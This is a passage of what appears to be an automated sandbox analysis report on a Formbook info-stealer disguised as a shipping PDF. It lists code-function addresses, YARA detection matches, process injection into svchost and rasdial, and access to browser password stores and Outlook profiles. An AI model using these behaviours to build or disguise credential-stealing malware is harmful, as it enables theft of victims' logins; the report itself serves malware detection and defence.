            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_039956C64_2_039956C6
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_0399DE7F4_2_0399DE7F
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 4_2_039B443F4_2_039B443F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047714605_2_04771460
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0482E4F65_2_0482E4F6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483F43F5_2_0483F43F
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_048324465_2_04832446
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_048405915_2_04840591
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0481D5B05_2_0481D5B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047805355_2_04780535
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_048375715_2_04837571
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_048316CC5_2_048316CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0479C6E05_2_0479C6E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047807705_2_04780770
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047A47505_2_047A4750
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483F7B05_2_0483F7B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0477C7C05_2_0477C7C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0482F0CC5_2_0482F0CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483F0E05_2_0483F0E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_048370E95_2_048370E9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047870C05_2_047870C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0476F1725_2_0476F172
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047B516C5_2_047B516C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_048401AA5_2_048401AA
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_048381CC5_2_048381CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047701005_2_04770100
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0481A1185_2_0481A118
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0478B1B05_2_0478B1B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0484B16B5_2_0484B16B
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_048212ED5_2_048212ED
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0479B2C05_2_0479B2C0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047852A05_2_047852A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_048202745_2_04820274
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0476D34C5_2_0476D34C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_048403E65_2_048403E6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0478E3F05_2_0478E3F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483132D5_2_0483132D
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483A3525_2_0483A352
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047C739A5_2_047C739A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04820CB55_2_04820CB5
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047F9C325_2_047F9C32
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483FCF25_2_0483FCF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04780C005_2_04780C00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04770CF25_2_04770CF2
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04783D405_2_04783D40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0478AD005_2_0478AD00
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0477ADE05_2_0477ADE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0479FDC05_2_0479FDC0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04798DBF5_2_04798DBF
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04831D5A5_2_04831D5A
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04837D735_2_04837D73
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483CE935_2_0483CE93
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04780E595_2_04780E59
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483EEDB5_2_0483EEDB
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483EE265_2_0483EE26
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04789EB05_2_04789EB0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04792E905_2_04792E90
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483FFB15_2_0483FFB1
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047F4F405_2_047F4F40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047A0F305_2_047A0F30
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483FF095_2_0483FF09
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0478CFE05_2_0478CFE0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04772FC85_2_04772FC8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04781F925_2_04781F92
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047828405_2_04782840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0478A8405_2_0478A840
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047AE8F05_2_047AE8F0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047838E05_2_047838E0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047668B85_2_047668B8
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047969625_2_04796962
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0484A9A65_2_0484A9A6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047899505_2_04789950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0479B9505_2_0479B950
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047829A05_2_047829A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047F3A6C5_2_047F3A6C
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0481DAAC5_2_0481DAAC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0482DAC65_2_0482DAC6
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04837A465_2_04837A46
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483FA495_2_0483FA49
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047C5AA05_2_047C5AA0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0477EA805_2_0477EA80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_04836BD75_2_04836BD7
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_047BDBF95_2_047BDBF9
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483AB405_2_0483AB40
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0483FB765_2_0483FB76
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0479FB805_2_0479FB80
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_028118A05_2_028118A0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_028131305_2_02813130
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0280C7A75_2_0280C7A7
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0280C7B05_2_0280C7B0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0282B5205_2_0282B520
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0280AA505_2_0280AA50
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_0280C9D05_2_0280C9D0
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_02814F605_2_02814F60
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045EE4335_2_045EE433
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045EE7CC5_2_045EE7CC
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045EE3145_2_045EE314
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: 5_2_045ED8385_2_045ED838
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04EF753E7_2_04EF753E
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED87CE7_2_04ED87CE
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED87C57_2_04ED87C5
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04EE0F7E7_2_04EE0F7E
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04EDD8BE7_2_04EDD8BE
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED89EE7_2_04ED89EE
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04EDF14E7_2_04EDF14E
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeCode function: 7_2_04ED6A6E7_2_04ED6A6E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0332B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03375130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03387E54 appears 96 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 047C7E54 appears 88 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 0476B970 appears 266 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 047FF290 appears 105 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 047EEA12 appears 84 times
            Source: C:\Windows\SysWOW64\rasdial.exeCode function: String function: 047B5130 appears 36 times
            Source: z4Shipping_document_pdf.exe, 00000000.00000003.2133449788.0000000004543000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z4Shipping_document_pdf.exe
            Source: z4Shipping_document_pdf.exe, 00000000.00000003.2133095429.00000000046ED000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs z4Shipping_document_pdf.exe
            Source: z4Shipping_document_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@16/14
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\polygamodioeciousJump to behavior
            Source: z4Shipping_document_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rasdial.exe, 00000005.00000003.2711192652.0000000002B86000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4550647811.0000000002BBB000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2711118853.0000000002B9A000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4550647811.0000000002B86000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: z4Shipping_document_pdf.exeReversingLabs: Detection: 31%
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeFile read: C:\Users\user\Desktop\z4Shipping_document_pdf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\z4Shipping_document_pdf.exe "C:\Users\user\Desktop\z4Shipping_document_pdf.exe"
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z4Shipping_document_pdf.exe"
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z4Shipping_document_pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: z4Shipping_document_pdf.exeStatic file information: File size 1400925 > 1048576
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: fWXPcgRbOhi.exe, 00000004.00000002.4550106724.000000000074E000.00000002.00000001.01000000.00000005.sdmp, fWXPcgRbOhi.exe, 00000007.00000000.2599591367.000000000074E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: z4Shipping_document_pdf.exe, 00000000.00000003.2133449788.0000000004420000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2132500581.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2133989700.0000000004610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2533390722.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430527068.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2428480144.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2533327247.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2535771557.0000000004599000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.0000000004740000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: rasdial.pdb source: svchost.exe, 00000002.00000002.2533187407.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2490844881.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4550908137.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000003.2460894338.00000000013F5000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: z4Shipping_document_pdf.exe, 00000000.00000003.2133449788.0000000004420000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2132500581.00000000045C0000.00000004.00001000.00020000.00000000.sdmp, z4Shipping_document_pdf.exe, 00000000.00000003.2133989700.0000000004610000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2533390722.000000000349E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2430527068.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2428480144.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2533390722.0000000003300000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000005.00000003.2533327247.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000003.2535771557.0000000004599000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.00000000048DE000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000005.00000002.4551581799.0000000004740000.00000040.00001000.00020000.00000000.sdmp
